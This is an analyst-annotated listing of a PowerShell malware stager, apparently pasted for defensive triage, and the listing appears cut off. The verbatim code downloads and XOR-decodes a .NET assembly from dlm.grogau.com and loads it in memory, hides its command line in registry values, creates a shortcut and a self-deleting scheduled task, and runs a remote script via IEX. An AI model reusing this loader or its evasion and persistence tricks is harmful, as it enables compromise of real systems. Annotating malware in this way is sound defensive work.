# Analyst annotations (defensive triage). The code lines below are unchanged from the paste.
# Summary of visible behaviour: a PowerShell stager that (1) fetches and XOR-decodes a .NET
# assembly and loads it in memory, (2) writes a randomly named .cmd that rebuilds a command
# line from registry value data and runs it, (3) creates a .lnk pointing at that .cmd,
# (4) registers a short-lived scheduled task that runs the .cmd and then deletes itself, and
# (5) downloads a further script and runs it with IEX.
# Network indicator on this page: host dlm.grogau.com (HTTPS, opaque base64-like query strings).
# Useful telemetry for this chain: PowerShell script block logging (event 4104), scheduled-task
# creation auditing (Security event 4698), file-creation events for .cmd/.lnk, and proxy/DNS logs.
#
# $fileName is defined outside the visible text. The branch runs only when that file is absent
# and creates it (content: empty string) first, so the file works as a "has already run" marker.
# NOTE(review): the closing brace of this `if` is not present in the paste; the listing looks cut.
- $bExists = [System.IO.File]::Exists($fileName)
- if (-Not $bExists) {
- "" | Set-Content $fileName
# Stage 1: raw bytes are fetched with Net.WebClient.DownloadData.
- $bytes = (New-Object Net.WebClient).DownloadData("https://dlm.grogau.com/?f2lnsQGKYqoGuIJdSOhrb8WFtI5DZgVu0cLfe09KTnjlK6L0bndQxwBUYz4oft6IGQeMqJv/DWmhFcHLLkAlCKJK/mX6+9WjQfBawwc0BcDp2w4=")
# Every byte is XORed with the single-byte key 0x6A, so the content on the wire is not a plain PE.
# For analysis, the same XOR applied to a captured response recovers the assembly.
- for($i=0; $i -lt $bytes.count; $i++) {
- $bytes[$i] = $bytes[$i] -bxor 0x6A
- }
# The decoded buffer is loaded as a .NET assembly from memory; no line here writes it to disk.
- [Reflection.Assembly]::Load($bytes)
# [Loader] is not defined in this script; presumably it comes from the assembly loaded above.
# $prefix is a random string (length argument from randomInt(4, 16)) followed by "-".
- $rInt = [Loader]::randomInt(4, 16)
- $prefix = "$([Loader]::RandomString($rInt))-"
# Go3 receives the host, four opaque base64-like tokens and $prefix. Its body is not visible.
# NOTE(review): the .cmd built below collects values under HKCU\Software\Microsoft whose names
# start with $prefix, so Go3 presumably writes those values - confirm from the decoded assembly.
- [Loader]::Go3("https://dlm.grogau.com","dmJvugeFYqECuIJdSOhrb8WFtI5DZgVu0cLfe09KTnjlK6L0bndQxwBUYz4oft6IGQeMqJv6NXK6DerhCEAmIqIR/mGlr+CvEK9CkVAwAw==","dmFgvA2DYKoC9JtBe8pKTMCSgpReVTJZ6rCiYUIhMHfsCILXa3FjyhosNA8yROSsOSOqjrjbPFOwN9DFNHgABIFrwGzs2KWxRPkVlFE8UJI=","dmhmsQSGY6sK9ZtBe8pKTMCSgpReVTJZ6rCiYUIhMHfsCILXa3FjyhosNA8yROSsOSOqjrjbPFOwN9DFNHgABIFrwG3R3+WEH/0b3VI3DJ61jgwv","dmFjvgGLYaIB8ptBe8pKTMCSgpReVTJZ6rCiYUIhMHfsCILXa3FjyhosNA8yROSsOSOqjrjbPFOwN9DFNHgABIFrwG3Ry6yEH/0b3QdhBsXp21wq",$prefix)
# Three random identifiers become the batch variable names, so the generated .cmd differs per run.
- $var1 = [Loader]::RandomString($rInt)
- $var2 = [Loader]::RandomString($rInt)
- $var3 = [Loader]::RandomString($rInt)
# The .cmd gets a random 6-16 argument name under [Loader]::outDir (directory not visible here).
- $cmdFileName = "$([Loader]::outDir)\$([Loader]::RandomString([Loader]::randomInt(6, 16))).cmd"
# Stage 2: the batch source is assembled line by line (CRLF endings, delayed expansion enabled).
- $cmdSource = "@Echo off`r`n"
- $cmdSource += "Setlocal EnableExtensions`r`n"
- $cmdSource += "Setlocal EnableDelayedExpansion`r`n"
# The key path HKCU\Software\Microsoft is built in three assignments rather than as one literal,
# so a plain string match on the full path will not hit the generated .cmd.
- $cmdSource += "Set $var1=HKCU`r`n"
- $cmdSource += "Set $var1=%$var1%\Software`r`n"
- $cmdSource += "Set $var1=%$var1%\Microsoft`r`n"
- $cmdSource += "Set $var2=`r`n"
# REG QUERY output is parsed per line: token 1 (value name), token 2 (type), rest of line (data).
- $cmdSource += "FOR /F `"usebackq tokens=1,2*`" %%1 IN (``REG QUERY %$var1%``) DO (`r`n"
# $var3 holds the first token followed by a literal "1"; only its leading characters are compared.
- $cmdSource += "Set $var3=%%11`r`n"
# Values whose name starts with $prefix have their data appended to the accumulator $var2.
- $cmdSource += "IF `"!$var3`:~0,$($prefix.Length)!`"==`"$prefix`" (`r`n"
- $cmdSource += "Set $var2=!$var2!%%3`r`n"
- $cmdSource += ")`r`n"
- $cmdSource += ")`r`n"
# The concatenated registry data is then executed as a command line. The command itself lives in
# the registry, not in the .cmd, so inspect HKCU\Software\Microsoft values named "<random>-...".
- $cmdSource += "%$var2%`r`n"
- $cmdSource | Set-Content $cmdFileName
# Stage 3: a shortcut named after the current user is written to outDir and targets the .cmd.
# WindowStyle 7 starts the target minimized.
# NOTE(review): if outDir resolves to a Startup folder this is logon persistence - confirm.
- $lnkFileName = "$([Loader]::outDir)\$env:USERNAME.lnk"
- $WshShell = New-Object -comObject WScript.Shell
- $Shortcut = $WshShell.CreateShortcut($lnkFilename)
- $Shortcut.TargetPath = $cmdFileName
- $Shortcut.WindowStyle = 7
- $Shortcut.Save()
# Stage 4: a task is registered through the Schedule.Service COM object (no schtasks.exe /Create
# command line is produced). The trigger window runs from now+5s to now+35s.
- $TaskStartTime = [datetime]::Now.AddSeconds(5)
- $TaskEndTime = [datetime]::Now.AddSeconds(35)
- $taskName = [Loader]::RandomString($rInt)
- $service = New-Object -ComObject("Schedule.Service")
- $service.Connect()
# The task is placed in the root task folder under a random name with an empty description.
- $rootFolder = $service.GetFolder("\")
- $TaskDefinition = $service.NewTask(0)
- $TaskDefinition.RegistrationInfo.Description = ""
- $TaskDefinition.Settings.Enabled = $true
- $TaskDefinition.Settings.DisallowStartIfOnBatteries = $false
# PT0M: the task is removed immediately once it has expired.
- $TaskDefinition.Settings.DeleteExpiredTaskAfter = "PT0M"
- $triggers = $TaskDefinition.Triggers
# Trigger type 1 is a one-time time trigger in the Task Scheduler COM API.
- $trigger = $triggers.Create(1)
- $trigger.StartBoundary = $TaskStartTime.ToString("yyyy-MM-dd'T'HH:mm:ss")
- $trigger.EndBoundary = $TaskEndTime.ToString("yyyy-MM-dd'T'HH:mm:ss")
- $trigger.Enabled = $true
# Action type 0 is "execute". First action: run the generated .cmd.
- $action = $TaskDefinition.Actions.Create(0)
- $action.Path = $cmdFileName
- $action.Arguments = ""
# Second action: the task deletes itself by name, so it will usually be gone by triage time;
# rely on task-creation and task-operational event logs rather than on the task still existing.
- $action = $TaskDefinition.Actions.Create(0)
- $action.Path = "schtasks.exe"
- $action.Arguments = "/Delete /TN $taskName /F"
# Flag 6 is create-or-update; no user or password is supplied and the logon type is 0.
- $rootFolder.RegisterTaskDefinition($taskName, $TaskDefinition, 6, "", $null, 0)
# $urlPL is assigned but not referenced again in the visible lines.
# NOTE(review): it may be read by the script fetched on the next line - confirm.
- $urlPL = "https://dlm.grogau.com/?dmFguwGEZqsF8JtBe8pKTMCSgpReVTJZ6rCiYUIhMHfsCILXa3FjyhosNA8yROSsOSOqjrjbIVOwT9TuamdZH69NzWvW2++EHJxP7gpNXcDdhQRgMV0A9QUrGfk="
# Stage 5: a further script is downloaded as text and executed in-process with IEX
# (Invoke-Expression). Its content is not on this page; script block logging would record it.
- IEX(New-Object Net.WebClient).DownloadString("https://dlm.grogau.com/?cWRjvAKCZaYCuIJdSOhrb8WFtI5DZgVu0cLfe09KTnjlK6L0bndQxwBUYz4oft6IGQeMqJvnNXLCEPnUC3g8MqFS/mLE+9OkOKRA8F45SMK8jwkkY1wC")